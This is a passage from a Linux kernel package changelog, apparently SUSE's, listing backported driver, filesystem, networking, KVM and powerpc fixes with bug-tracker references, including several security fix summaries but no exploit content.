- dlm: Do not swamp the CPU with callbacks queued during recovery (bnc#1012382).
- dmaengine: imx-dma: fix wrong callback invoke (bnc#1012382).
- dm crypt: add cryptographic data integrity protection (authenticated encryption) (Git-fixes).
- dm crypt: factor IV constructor out to separate function (Git-fixes).
- dm crypt: fix crash by adding missing check for auth key size (git-fixes).
- dm crypt: fix error return code in crypt_ctr() (git-fixes).
- dm crypt: fix memory leak in crypt_ctr_cipher_old() (git-fixes).
- dm crypt: introduce new format of cipher with "capi:" prefix (Git-fixes).
- dm crypt: wipe kernel key copy after IV initialization (Git-fixes).
- dm: do not allow readahead to limit IO size (git fixes (readahead)).
- dm kcopyd: Fix bug causing workqueue stalls (bnc#1012382).
- dm snapshot: Fix excessive memory usage and workqueue stalls (bnc#1012382).
- dm thin: fix bug where bio that overwrites thin block ignores FUA (bnc#1012382).
- Documentation/network: reword kernel version reference (bnc#1012382).
- drbd: Avoid Clang warning about pointless switch statment (bnc#1012382).
- drbd: disconnect, if the wrong UUIDs are attached on a connected peer (bnc#1012382).
- drbd: narrow rcu_read_lock in drbd_sync_handshake (bnc#1012382).
- drbd: skip spurious timeout (ping-timeo) when failing promote (bnc#1012382).
- drivers: core: Remove glue dirs from sysfs earlier (bnc#1012382).
- Drivers: hv: vmbus: Check for ring when getting debug info (bsc#1126389).
- drm/bufs: Fix Spectre v1 vulnerability (bnc#1012382).
- drm: Fix error handling in drm_legacy_addctx (bsc#1106929).
- drm/i915: Block fbdev HPD processing during suspend (bsc#1106929).
- drm/i915: Prevent a race during I915_GEM_MMAP ioctl with WC set (bsc#1106929).
- drm/modes: Prevent division by zero htotal (bnc#1012382).
- drm/nouveau/bios/ramcfg: fix missing parentheses when calculating RON (bsc#1106929).
- drm/nouveau/pmu: do not print reply values if exec is false (bsc#1106929).
- drm/radeon/evergreen_cs: fix missing break in switch statement (bsc#1106929).
- drm/vmwgfx: Do not double-free the mode stored in par->set_mode (bsc#1103429).
- drm/vmwgfx: Fix setting of dma masks (bsc#1106929).
- drm/vmwgfx: Return error code from vmw_execbuf_copy_fence_user (bsc#1106929).
- e1000e: allow non-monotonic SYSTIM readings (bnc#1012382).
- EDAC: Raise the maximum number of memory controllers (bsc#1120722).
- efi/libstub/arm64: Use hidden attribute for struct screen_info reference (bsc#1122650).
- enic: add wq clean up budget (bsc#1075697, bsc#1120691, bsc#1102959).
- enic: do not overwrite error code (bnc#1012382).
- enic: fix checksum validation for IPv6 (bnc#1012382).
- exec: load_script: do not blindly truncate shebang string (bnc#1012382).
- ext4: fix a potential fiemap/page fault deadlock w/ inline_data (bnc#1012382).
- ext4: Fix crash during online resizing (bsc#1122779).
- f2fs: Add sanity_check_inode() function (bnc#1012382).
- f2fs: avoid unneeded loop in build_sit_entries (bnc#1012382).
- f2fs: check blkaddr more accuratly before issue a bio (bnc#1012382).
- f2fs: clean up argument of recover_data (bnc#1012382).
- f2fs: clean up with is_valid_blkaddr() (bnc#1012382).
- f2fs: detect wrong layout (bnc#1012382).
- f2fs: enhance sanity_check_raw_super() to avoid potential overflow (bnc#1012382).
- f2fs: factor out fsync inode entry operations (bnc#1012382).
- f2fs: fix inode cache leak (bnc#1012382).
- f2fs: fix invalid memory access (bnc#1012382).
- f2fs: fix missing up_read (bnc#1012382).
- f2fs: fix to avoid reading out encrypted data in page cache (bnc#1012382).
- f2fs: fix to convert inline directory correctly (bnc#1012382).
- f2fs: fix to determine start_cp_addr by sbi->cur_cp_pack (bnc#1012382).
- f2fs: fix to do sanity check with block address in main area (bnc#1012382).
- f2fs: fix to do sanity check with block address in main area v2 (bnc#1012382).
- f2fs: fix to do sanity check with cp_pack_start_sum (bnc#1012382).
- f2fs: fix to do sanity check with node footer and iblocks (bnc#1012382).
- f2fs: fix to do sanity check with reserved blkaddr of inline inode (bnc#1012382).
- f2fs: fix to do sanity check with secs_per_zone (bnc#1012382).
- f2fs: fix to do sanity check with user_block_count (bnc#1012382).
- f2fs: fix validation of the block count in sanity_check_raw_super (bnc#1012382).
- f2fs: fix wrong return value of f2fs_acl_create (bnc#1012382).
- f2fs: free meta pages if sanity check for ckpt is failed (bnc#1012382).
- f2fs: give -EINVAL for norecovery and rw mount (bnc#1012382).
- f2fs: introduce and spread verify_blkaddr (bnc#1012382).
- f2fs: introduce get_checkpoint_version for cleanup (bnc#1012382).
- f2fs: move dir data flush to write checkpoint process (bnc#1012382).
- f2fs: move sanity checking of cp into get_valid_checkpoint (bnc#1012382).
- f2fs: not allow to write illegal blkaddr (bnc#1012382).
- f2fs: put directory inodes before checkpoint in roll-forward recovery (bnc#1012382).
- f2fs: read page index before freeing (bnc#1012382).
- f2fs: remove an obsolete variable (bnc#1012382).
- f2fs: return error during fill_super (bnc#1012382).
- f2fs: sanity check on sit entry (bnc#1012382).
- f2fs: use crc and cp version to determine roll-forward recovery (bnc#1012382).
- fbdev: chipsfb: remove set but not used variable 'size' (bsc#1106929).
- Fix incorrect value for X86_FEATURE_TSX_FORCE_ABORT.
- Fix problem with sharetransport= and NFSv4 (bsc#1114893).
- fs: add the fsnotify call to vfs_iter_write (bnc#1012382).
- fs/dcache: Fix incorrect nr_dentry_unused accounting in shrink_dcache_sb() (bnc#1012382).
- fs: do not scan the inode cache before SB_BORN is set (bnc#1012382).
- fs/epoll: drop ovflist branch prediction (bnc#1012382).
- fs: fix lost error code in dio_complete (bsc#1117744).
- fuse: call pipe_buf_release() under pipe lock (bnc#1012382).
- fuse: decrement NR_WRITEBACK_TEMP on the right page (bnc#1012382).
- fuse: handle zero sized retrieve correctly (bnc#1012382).
- futex: Fix (possible) missed wakeup (bsc#1050549).
- gdrom: fix a memory leak bug (bnc#1012382).
- gfs2: Revert "Fix loop in gfs2_rbm_find" (bnc#1012382).
- gpiolib: Fix return value of gpio_to_desc() stub if !GPIOLIB (Git-fixes).
- gpio: pl061: handle failed allocations (bnc#1012382).
- gpu: ipu-v3: Fix CSI offsets for imx53 (bsc#1106929).
- gpu: ipu-v3: Fix i.MX51 CSI control registers offset (bsc#1106929).
- HID: debug: fix the ring buffer implementation (bnc#1012382).
- HID: lenovo: Add checks to fix of_led_classdev_register (bnc#1012382).
- hwmon: (lm80) fix a missing check of bus read in lm80 probe (bnc#1012382).
- hwmon: (lm80) fix a missing check of the status of SMBus read (bnc#1012382).
- hwmon: (lm80) Fix missing unlock on error in set_fan_div() (git-fixes).
- i2c-axxia: check for error conditions first (bnc#1012382).
- i2c: dev: prevent adapter retries and timeout being set as minus value (bnc#1012382).
- IB/core: type promotion bug in rdma_rw_init_one_mr().
- ibmveth: Do not process frames after calling napi_reschedule (bsc#1123357).
- ibmvnic: Add ethtool private flag for driver-defined queue limits (bsc#1121726).
- ibmvnic: Increase maximum queue size limit (bsc#1121726).
- ibmvnic: Introduce driver limits for ring sizes (bsc#1121726).
- ibmvnic: Report actual backing device speed and duplex values (bsc#1129923).
- ibmvscsi: Fix empty event pool access during host removal (bsc#1119019).
- IB/rxe: Fix incorrect cache cleanup in error flow.
- IB/rxe: replace kvfree with vfree.
- igb: Fix an issue that PME is not enabled during runtime suspend (bnc#1012382).
- inet: frags: add a pointer to struct netns_frags (bnc#1012382).
- inet: frags: better deal with smp races (bnc#1012382).
- inet: frags: break the 2GB limit for frags storage (bnc#1012382).
- inet: frags: change inet_frags_init_net() return value (bnc#1012382).
- inet: frags: do not clone skb in ip_expire() (bnc#1012382).
- inet: frags: fix ip6frag_low_thresh boundary (bnc#1012382).
- inet: frags: get rid of ipfrag_skb_cb/FRAG_CB (bnc#1012382).
- inet: frags: get rif of inet_frag_evicting() (bnc#1012382).
- inet: frags: refactor ipfrag_init() (bnc#1012382).
- inet: frags: refactor ipv6_frag_init() (bnc#1012382).
- inet: frags: refactor lowpan_net_frag_init() (bnc#1012382).
- inet: frags: remove inet_frag_maybe_warn_overflow() (bnc#1012382).
- inet: frags: remove some helpers (bnc#1012382).
- inet: frags: reorganize struct netns_frags (bnc#1012382).
- inet: frags: use rhashtables for reassembly units (bnc#1012382).
- input: bma150 - register input device after setting private data (bnc#1012382).
- input: elan_i2c - add ACPI ID for touchpad in Lenovo V330-15ISK (bnc#1012382).
- input: elantech - enable 3rd button support on Fujitsu CELSIUS H780 (bnc#1012382).
- input: mms114 - fix license module information (bsc#1087092).
- input: xpad - add support for SteelSeries Stratus Duo (bnc#1012382).
- intel_pstate: Update frequencies of policy->cpus only from ->set_policy() (bsc#1120017).
- iommu/amd: Call free_iova_fast with pfn in map_sg (bsc#1106105).
- iommu/amd: Fix IOMMU page flush when detach device from a domain (bsc#1106105).
- iommu/amd: Unmap all mapped pages in error path of map_sg (bsc#1106105).
- iommu/arm-smmu-v3: Use explicit mb() when moving cons pointer (bnc#1012382).
- iommu/dmar: Fix buffer overflow during PCI bus notification (bsc#1129237).
- iommu/io-pgtable-arm-v7s: Only kmemleak_ignore L2 tables (bsc#1129238).
- iommu/vt-d: Check identity map for hot-added devices (bsc#1129239).
- iommu/vt-d: Fix memory leak in intel_iommu_put_resv_regions() (bsc#1106105).
- iommu/vt-d: Fix NULL pointer reference in intel_svm_bind_mm() (bsc#1129240).
- ip: add helpers to process in-order fragments faster (bnc#1012382).
- ipfrag: really prevent allocation on netns exit (bnc#1012382).
- ip: frags: fix crash in ip_do_fragment() (bnc#1012382).
- ipmi:ssif: Fix handling of multi-part return messages (bnc#1012382).
- ip: on queued skb use skb_header_pointer instead of pskb_may_pull (bnc#1012382).
- ip: process in-order fragments efficiently (bnc#1012382).
- ip: use rb trees for IP frag queue (bnc#1012382).
- ipv4: frags: precedence bug in ip_expire() (bnc#1012382).
- ipv6: Consider sk_bound_dev_if when binding a socket to an address (bnc#1012382).
- ipv6: Consider sk_bound_dev_if when binding a socket to a v4 mapped address (bnc#1012382).
- ipv6: fix kernel-infoleak in ipv6_local_error() (bnc#1012382).
- ipv6: frags: rewrite ip6_expire_frag_queue() (bnc#1012382).
- ipv6: Take rcu_read_lock in __inet6_bind for mapped addresses (bnc#1012382).
- irqchip/gic-v3-its: Align PCI Multi-MSI allocation on their size (bnc#1012382).
- isdn: hisax: hfc_pci: Fix a possible concurrency use-after-free bug in HFCPCI_l1hw() (bnc#1012382).
- ixgbe: fix crash in build_skb Rx code path (git-fixes).
- jffs2: Fix use of uninitialized delayed_work, lockdep breakage (bnc#1012382).
- kABI: protect linux/kfifo.h include in hid-debug (kabi).
- kABI: protect struct hda_bus (kabi).
- kABI: protect struct inet_peer (kabi).
- kabi: reorder new slabinfo fields in struct kmem_cache_node (bnc#1116653).
- kallsyms: Handle too long symbols in kallsyms.c (bsc#1126805).
- kaweth: use skb_cow_head() to deal with cloned skbs (bnc#1012382).
- kconfig: fix file name and line number of warn_ignored_character() (bnc#1012382).
- kconfig: fix memory leak when EOF is encountered in quotation (bnc#1012382).
- kernel/exit.c: release ptraced tasks before zap_pid_ns_processes (bnc#1012382).
- kernel/hung_task.c: break RCU locks based on jiffies (bnc#1012382).
- KMPs: obsolete older KMPs of the same flavour (bsc#1127155, bsc#1109137).
- kvm: arm/arm64: vgic-its: Check CBASER/BASER validity before enabling the ITS (bsc#1109248).
- kvm: arm/arm64: vgic-its: Check GITS_BASER Valid bit before saving tables (bsc#1109248).
- kvm: arm/arm64: vgic-its: Fix return value for device table restore (bsc#1109248).
- kvm: arm/arm64: vgic-its: Fix vgic_its_restore_collection_table returned value (bsc#1109248).
- kvm: nVMX: Do not halt vcpu when L1 is injecting events to L2 (bsc#1129413).
- kvm: nVMX: Free the VMREAD/VMWRITE bitmaps if alloc_kvm_area() fails (bsc#1129414).
- kvm: nVMX: NMI-window and interrupt-window exiting should wake L2 from HLT (bsc#1129415).
- kvm: nVMX: Set VM instruction error for VMPTRLD of unbacked page (bsc#1129416).
- kvm: VMX: Do not allow reexecute_instruction() when skipping MMIO instr (bsc#1129417).
- kvm: VMX: Fix x2apic check in vmx_msr_bitmap_mode() (bsc#1124166).
- kvm: VMX: Missing part of upstream commit 904e14fb7cb9 (bsc#1124166).
- kvm: vmx: Set IA32_TSC_AUX for legacy mode guests (bsc#1129418).
- kvm: x86: Add AMD's EX_CFG to the list of ignored MSRs (bsc#1127082).
- kvm: x86: Fix single-step debugging (bnc#1012382).
- kvm: x86: IA32_ARCH_CAPABILITIES is always supported (bsc#1129419).
- kvm: x86: svm: report MSR_IA32_MCG_EXT_CTL as unsupported (bnc#1012382).
- l2tp: copy 4 more bytes to linear part if necessary (bnc#1012382).
- l2tp: fix reading optional fields of L2TPv3 (bnc#1012382).
- l2tp: remove l2specific_len dependency in l2tp_core (bnc#1012382).
- libceph: avoid KEEPALIVE_PENDING races in ceph_con_keepalive() (bsc#1125810).
- libceph: handle an empty authorize reply (bsc#1126772).
- libnvdimm: fix ars_status output length calculation (bsc#1124777).
- libnvdimm, pfn: Pad pfn namespaces relative to other regions (bsc#1124811).
- libnvdimm: Use max contiguous area for namespace size (bsc#1124780).
- locking/rwsem: Fix (possible) missed wakeup (bsc#1050549).
- loop: Fix double mutex_unlock(&loop_ctl_mutex) in loop_control_ioctl() (bnc#1012382).
- loop: Fold __loop_release into loop_release (bnc#1012382).
- loop: Get rid of loop_index_mutex (bnc#1012382).
- LSM: Check for NULL cred-security on free (bnc#1012382).
- mac80211: ensure that mgmt tx skbs have tailroom for encryption (bnc#1012382).
- mac80211: fix radiotap vendor presence bitmap handling (bnc#1012382).
- md: batch flush requests (bsc#1119680).
- mdio_bus: Fix use-after-free on device_register fails (git-fixes).
- media: DaVinci-VPBE: fix error handling in vpbe_initialize() (bnc#1012382).
- media: em28xx: Fix misplaced reset of dev->v4l::field_count (bnc#1012382).
- media: firewire: Fix app_info parameter type in avc_ca{,_app}_info (bnc#1012382).
- media: vb2: be sure to unlock mutex on errors (bnc#1012382).
- media: vb2: vb2_mmap: move lock up (bnc#1012382).
- media: vivid: fix error handling of kthread_run (bnc#1012382).
- media: vivid: set min width/height to a value > 0 (bnc#1012382).
- memstick: Prevent memstick host from getting runtime suspended during card detection (bnc#1012382).
- mfd: as3722: Handle interrupts on suspend (bnc#1012382).
- mfd: as3722: Mark PM functions as __maybe_unused (bnc#1012382).
- mfd: tps6586x: Handle interrupts on suspend (bnc#1012382).
- misc: vexpress: Off by one in vexpress_syscfg_exec() (bnc#1012382).
- mISDN: fix a race in dev_expire_timer() (bnc#1012382).
- mlxsw: pci: Correctly determine if descriptor queue is full (git-fixes).
- mlxsw: reg: Use correct offset in field definiton (git-fixes).
- mmc: atmel-mci: do not assume idle after atmci_request_end (bnc#1012382).
- mmc: bcm2835: Fix DMA channel leak on probe error (bsc#1120902).
- mmc: sdhci-iproc: handle mmc_of_parse() errors during probe (bnc#1012382).
- mm, devm_memremap_pages: mark devm_memremap_pages() EXPORT_SYMBOL_GPL (bnc#1012382).
- mm,memory_hotplug: fix scan_movable_pages() for gigantic hugepages (bsc#1127731).
- mm: migrate: do not rely on __PageMovable() of newpage after unlocking it (bnc#1012382).
- mm: only report isolation failures when offlining memory (generic hotplug debugability).
- mm, oom: fix use-after-free in oom_kill_process (bnc#1012382).
- mm, page_alloc: drop should_suppress_show_mem (bnc#1125892, bnc#1106061).
- mm/page-writeback.c: do not break integrity writeback on ->writepage() error (bnc#1012382).
- mm, proc: be more verbose about unstable VMA flags in /proc/<pid>/smaps (bnc#1012382).
- mm, slab: faster active and free stats (bsc#1116653, VM Performance).
- mm/slab: improve performance of gathering slabinfo stats (bsc#1116653, VM Performance).
- mm, slab: maintain total slab count instead of active count (bsc#1116653, VM Performance).
- modpost: validate symbol names also in find_elf_symbol (bnc#1012382).
- mtd: rawnand: gpmi: fix MX28 bus master lockup problem (bnc#1012382).
- net: Add header for usage of fls64() (bnc#1012382).
- net: bridge: fix a bug on using a neighbour cache entry without checking its state (bnc#1012382).
- net: bridge: Fix ethernet header pointer before check skb forwardable (bnc#1012382).
- net: call sk_dst_reset when set SO_DONTROUTE (bnc#1012382).
- net: Do not allocate page fragments that are not skb aligned (bnc#1012382).
- net: dp83640: expire old TX-skb (bnc#1012382).
- net: dsa: bcm_sf2: Do not assume DSA master supports WoL (git-fixes).
- net: dsa: mv88e6xxx: fix port VLAN maps (git-fixes).
- net: dsa: slave: Do not propagate flag changes on down slave interfaces (bnc#1012382).
- net: Fix for_each_netdev_feature on Big endian (bnc#1012382).
- net: fix IPv6 prefix route residue (bnc#1012382).
- net: fix pskb_trim_rcsum_slow() with odd trim offset (bnc#1012382).
- net: Fix usage of pskb_trim_rcsum (bnc#1012382).
- net/hamradio/6pack: Convert timers to use timer_setup() (git-fixes).
- net/hamradio/6pack: use mod_timer() to rearm timers (git-fixes).
- net: ieee802154: 6lowpan: fix frag reassembly (bnc#1012382).
- net: ipv4: do not handle duplicate fragments as overlapping (bnc#1012382 bsc#1116345).
- net: ipv4: Fix memory leak in network namespace dismantle (bnc#1012382).
- net: ipv4: use a dedicated counter for icmp_v4 redirect packets (bnc#1012382).
- net: lan78xx: Fix race in tx pending skb size calculation (git-fixes).
- net/mlx4_core: Add masking for a few queries on HCA caps (bnc#1012382).
- net/mlx4_core: drop useless LIST_HEAD (git-fixes).
- net/mlx4_core: Fix qp mtt size calculation (git-fixes).
- net/mlx4_core: Fix reset flow when in command polling mode (git-fixes).
- net/mlx4: Fix endianness issue in qp context params (git-fixes).
- net/mlx5: Continue driver initialization despite debugfs failure (git-fixes).
- net/mlx5e: Fix TCP checksum in LRO buffers (git-fixes).
- net/mlx5: Fix driver load bad flow when having fw initializing timeout (git-fixes).
- net/mlx5: fix uaccess beyond "count" in debugfs read/write handlers (git-fixes).
- net/mlx5: Fix use-after-free in self-healing flow (git-fixes).
- net/mlx5: Return success for PAGE_FAULT_RESUME in internal error state (git-fixes).
- net: modify skb_rbtree_purge to return the truesize of all purged skbs (bnc#1012382).
- net: mv643xx_eth: fix packet corruption with TSO and tiny unaligned packets (git-fixes).
- net: phy: Avoid polling PHY with PHY_IGNORE_INTERRUPTS (git-fixes).
- net: phy: bcm7xxx: Fix shadow mode 2 disabling (git-fixes).
- net: pskb_trim_rcsum() and CHECKSUM_COMPLETE are friends (bnc#1012382).
- net: qca_spi: Fix race condition in spi transfers (git-fixes).
- netrom: switch to sock timer API (bnc#1012382).
- net/rose: fix NULL ax25_cb kernel panic (bnc#1012382).
- net_sched: refetch skb protocol for each filter (bnc#1012382).
- net: speed up skb_rbtree_purge() (bnc#1012382).
- net: stmmac: Fix a race in EEE enable callback (bnc#1012382).
- net: stmmac: Fix a race in EEE enable callback (git-fixes).
- net: systemport: Fix WoL with password after deep sleep (bnc#1012382).
- net: thunderx: set tso_hdrs pointer to NULL in nicvf_free_snd_queue (git-fixes).
- net/x25: do not hold the cpu too long in x25_new_lci() (bnc#1012382).
- NFC: nxp-nci: Include unaligned.h instead of access_ok.h (bnc#1012382).
- nfit: fix unchecked dereference in acpi_nfit_ctl (bsc#1125014).
- nfsd4: fix crash on writing v4_end_grace before nfsd startup (bnc#1012382).
- NFS: nfs_compare_mount_options always compare auth flavors (bnc#1012382).
- niu: fix missing checks of niu_pci_eeprom_read (bnc#1012382).
- ocfs2: do not clear bh uptodate for block read (bnc#1012382).
- ocfs2: fix panic due to unrecovered local alloc (bnc#1012382).
- omap2fb: Fix stack memory disclosure (bsc#1106929).
- openvswitch: Avoid OOB read when parsing flow nlattrs (bnc#1012382).
- packet: Do not leak dev refcounts on error exit (bnc#1012382).
- pci: altera: Check link status before retrain link (bnc#1012382).
- pci: altera: Fix altera_pcie_link_is_up() (bnc#1012382).
- pci: altera: Move retrain from fixup to altera_pcie_host_init() (bnc#1012382).
- pci: altera: Poll for link training status after retraining the link (bnc#1012382).
- pci: altera: Poll for link up status after retraining the link (bnc#1012382).
- pci: altera: Reorder read/write functions (bnc#1012382).
- pci: altera: Rework config accessors for use without a struct pci_bus (bnc#1012382).
- pci/PME: Fix hotplug/sysfs remove deadlock in pcie_pme_remove() (bsc#1129241).
- perf/core: Do not WARN() for impossible ring-buffer sizes (bnc#1012382).
- perf/core: Fix impossible ring-buffer sizes warning (bnc#1012382).
- perf intel-pt: Fix error with config term "pt=0" (bnc#1012382).
- perf parse-events: Fix unchecked usage of strncpy() (bnc#1012382).
- perf svghelper: Fix unchecked usage of strncpy() (bnc#1012382).
- perf tests evsel-tp-sched: Fix bitwise operator (bnc#1012382).
- perf tools: Add Hygon Dhyana support (bnc#1012382).
- perf unwind: Take pgoff into account when reporting elf to libdwfl (bnc#1012382).
- perf unwind: Unwind with libdw does not take symfs into account (bnc#1012382).
- perf/x86: Add sysfs entry to freeze counters on SMI (bsc#1121805).
- perf/x86/intel: Delay memory deallocation until x86_pmu_dead_cpu() (bsc#1121805).
- perf/x86/intel: Do not enable freeze-on-smi for PerfMon V1 (bsc#1121805).
- perf/x86/intel: Fix memory corruption (bsc#1121805).
- perf/x86/intel: Generalize dynamic constraint creation (bsc#1121805).
- perf/x86/intel: Implement support for TSX Force Abort (bsc#1121805).
- perf/x86/intel: Make cpuc allocations consistent (bsc#1121805).
- perf/x86/intel/uncore: Add Node ID mask (bnc#1012382).
- phy: micrel: Ensure interrupts are reenabled on resume (git-fixes).
- pinctrl: msm: fix gpio-hog related boot issues (bnc#1012382).
- platform/x86: asus-nb-wmi: Drop mapping of 0x33 and 0x34 scan codes (bnc#1012382).
- platform/x86: asus-nb-wmi: Map 0x35 to KEY_SCREENLOCK (bnc#1012382).
- platform/x86: asus-wmi: Tell the EC the OS will handle the display off hotkey (bnc#1012382).
- platform/x86: thinkpad_acpi: Proper model/release matching (bsc#1099810).
- powerpc/cacheinfo: Report the correct shared_cpu_map on big-cores (bsc#1109695). - powerpc: Detect the presence of big-cores via "ibm, thread-groups" (bsc#1109695). - powerpc, hotplug: Avoid to touch non-existent cpumasks (bsc#1109695). - powerpc: make use of for_each_node_by_type() instead of open-coding it (bsc#1109695). - powerpc/pseries: Add CPU dlpar remove functionality (bsc#1128756). - powerpc/pseries: add of_node_put() in dlpar_detach_node() (bnc#1012382). - powerpc/pseries: Consolidate CPU hotplug code to hotplug-cpu.c (bsc#1128756). - powerpc/pseries/cpuidle: Fix preempt warning (bnc#1012382). - powerpc/pseries: Factor out common cpu hotplug code (bsc#1128756). - powerpc/pseries: Perform full re-add of CPU for topology update post-migration (bsc#1128756). - powerpc/setup: Add cpu_to_phys_id array (bsc#1109695). - powerpc/smp: Add cpu_l2_cache_map (bsc#1109695). - powerpc/smp: Add Power9 scheduler topology (bsc#1109695). - powerpc/smp: Rework CPU topology construction (bsc#1109695). - powerpc/smp: Use cpu_to_chip_id() to find core siblings (bsc#1109695). - powerpc/uaccess: fix warning/error with access_ok() (bnc#1012382). - powerpc: Use cpu_smallcore_sibling_mask at SMT level on bigcores (bsc#1109695). - powerpc/xmon: Fix invocation inside lock region (bsc#1122885). - pppoe: fix reception of frames with no mac header (git-fixes). - pptp: dst_release sk_dst_cache in pptp_sock_destruct (git-fixes). - proc: Remove empty line in /proc/self/status (bnc#1012382 bsc#1094823). - pseries/energy: Use OF accessor function to read ibm,drc-indexes (bsc#1129080). - pstore/ram: Do not treat empty buffers as valid (bnc#1012382). - ptp: check gettime64 return code in PTP_SYS_OFFSET ioctl (bnc#1012382). - r8169: Add support for new Realtek Ethernet (bnc#1012382). - rbd: do not return 0 on unmap if RBD_DEV_FLAG_REMOVING is set (bsc#1125808). - rcu: Force boolean subscript for expedited stall warnings (bnc#1012382). 
- RDMA/bnxt_re: Fix a couple off by one bugs (bsc#1020413). - RDMA/bnxt_re: Synchronize destroy_qp with poll_cq (bsc#1125446). - Revert "bs-upload-kernel: do not set %opensuse_bs" This reverts commit e89e2b8cbef05df6c874ba70af3cb4c57f82a821. - Revert "cifs: In Kconfig CONFIG_CIFS_POSIX needs depends on legacy (insecure cifs)" (bnc#1012382). - Revert "exec: load_script: do not blindly truncate shebang string" (bnc#1012382). - Revert "Input: elan_i2c - add ACPI ID for touchpad in ASUS Aspire F5-573G" (bnc#1012382). - Revert "loop: Fix double mutex_unlock(&loop_ctl_mutex) in loop_control_ioctl()" (bnc#1012382). - Revert "loop: Fold __loop_release into loop_release" (bnc#1012382). - Revert "loop: Get rid of loop_index_mutex" (bnc#1012382). - Revert "mmc: bcm2835: Fix DMA channel leak on probe error (bsc#1120902)." The backport patch does not build properly. - Revert "mm, devm_memremap_pages: mark devm_memremap_pages() EXPORT_SYMBOL_GPL" (bnc#1012382). - Revert "net: stmmac: Fix a race in EEE enable callback (git-fixes)." This reverts commit f323fa8d233c1f44aff17e6fae90c2c8be30edf9. The patch was already included in stable 4.4.176. - Revert "sd: disable logical block provisioning if 'lbpme' is not set" This reverts commit 96370bd87299c7a6883b3e2bf13818f60c8ba611. Patch not accepted upstream. - Revert "x86/platform/UV: Use efi_runtime_lock to serialise BIOS calls" (bsc#1128565). - rhashtable: Add rhashtable_lookup() (bnc#1012382). - rhashtable: add rhashtable_lookup_get_insert_key() (bnc#1012382 bsc#1042286). - rhashtable: add schedule points (bnc#1012382). - rhashtable: reorganize struct rhashtable layout (bnc#1012382). - s390/early: improve machine detection (bnc#1012382). - s390/qeth: cancel close_dev work before removing a card (LTC#175898, bsc#1127561). - s390/smp: Fix calling smp_call_ipl_cpu() from ipl CPU (bnc#1012382). - s390/smp: fix CPU hotplug deadlock with CPU rescan (bnc#1012382). - sata_rcar: fix deferred probing (bnc#1012382). 
- sched/wake_q: Document wake_q_add() (bsc#1050549). - sched/wake_q: Fix wakeup ordering for wake_q (bsc#1050549). - sched/wake_q: Reduce reference counting for special users (bsc#1050549). - scripts/decode_stacktrace: only strip base path when a prefix of the path (bnc#1012382). - scripts/git_sort/git_sort.py: Add mkp/scsi 5.0/scsi-fixes - scsi: aacraid: Fix missing break in switch statement (bsc#1128696). - scsi: ibmvscsi: Fix empty event pool access during host removal (bsc#1119019). - scsi: lpfc: Correct LCB RJT handling (bnc#1012382). - scsi: lpfc: Correct MDS diag and nvmet configuration (bsc#1125796). - scsi: lpfc: do not set queue->page_count to 0 if pc_sli4_params.wqpcnt is invalid (bsc#1127725). - scsi: megaraid: fix out-of-bound array accesses (bnc#1012382). - scsi: mpt3sas: Add an I/O barrier (bsc#1117108). - scsi: mpt3sas: Added support for nvme encapsulated request message (bsc#1117108). - scsi: mpt3sas: Added support for SAS Device Discovery Error Event (bsc#1117108). - scsi: mpt3sas: Adding support for SAS3616 HBA device (bsc#1117108). - scsi: mpt3sas: Add ioc_<level> logging macros (bsc#1117108). - scsi: mpt3sas: Add nvme device support in slave alloc, target alloc and probe (bsc#1117108). - scsi: mpt3sas: Add PCI device ID for Andromeda (bsc#1117108). - scsi: mpt3sas: Add-Task-management-debug-info-for-NVMe-drives (bsc#1117108). - scsi: mpt3sas: Allow processing of events during driver unload (bsc#1117108). - scsi: mpt3sas: always use first reserved smid for ioctl passthrough (bsc#1117108). - scsi: mpt3sas: Annotate switch/case fall-through (bsc#1117108). - scsi: mpt3sas: API's to remove nvme drive from sml (bsc#1117108). - scsi: mpt3sas: API 's to support NVMe drive addition to SML (bsc#1117108). - scsi: mpt3sas: As per MPI-spec, use combined reply queue for SAS3.5 controllers when HBA supports more than 16 MSI-x vectors (bsc#1117108). - scsi: mpt3sas: Bug fix for big endian systems (bsc#1117108). 
- scsi: mpt3sas: Bump mpt3sas driver version to v16.100.00.00 (bsc#1117108). - scsi: mpt3sas: Cache enclosure pages during enclosure add (bsc#1117108). - scsi: mpt3sas: check command status before attempting abort (bsc#1117108). - scsi: mpt3sas: clarify mmio pointer types (bsc#1117108). - scsi: mpt3sas: cleanup _scsih_pcie_enumeration_event() (bsc#1117108). - scsi: mpt3sas: Configure reply post queue depth, DMA and sgl tablesize (bsc#1117108). - scsi: mpt3sas: Convert logging uses with MPT3SAS_FMT and reply_q_name to %s: (bsc#1117108). - scsi: mpt3sas: Convert logging uses with MPT3SAS_FMT without logging levels (bsc#1117108). - scsi: mpt3sas: Convert misleading uses of pr_<level> with MPT3SAS_FMT (bsc#1117108). - scsi: mpt3sas: Convert uses of pr_<level> with MPT3SAS_FMT to ioc_<level> (bsc#1117108). - scsi: mpt3sas: Display chassis slot information of the drive (bsc#1117108). - scsi: mpt3sas: Do not abort I/Os issued to NVMe drives while processing Async Broadcast primitive event (bsc#1117108). - scsi: mpt3sas: Do not access the structure after decrementing its instance reference count (bsc#1117108). - scsi: mpt3sas: Do not use 32-bit atomic request descriptor for Ventura controllers (bsc#1117108). - scsi: mpt3sas: Enhanced handling of Sense Buffer (bsc#1117108). - scsi: mpt3sas: fix an out of bound write (bsc#1117108). - scsi: mpt3sas: Fix a race condition in mpt3sas_base_hard_reset_handler() (bsc#1117108). - scsi: mpt3sas: Fix calltrace observed while running IO & reset (bsc#1117108). - scsi: mpt3sas: fix dma_addr_t casts (bsc#1117108). - scsi: mpt3sas: Fixed memory leaks in driver (bsc#1117108). - scsi: mpt3sas: Fix, False timeout prints for ioctl and other internal commands during controller reset (bsc#1117108). - scsi: mpt3sas: fix format overflow warning (bsc#1117108). - scsi: mpt3sas: Fix indentation (bsc#1117108). - scsi: mpt3sas: Fix memory allocation failure test in 'mpt3sas_base_attach()' (bsc#1117108). 
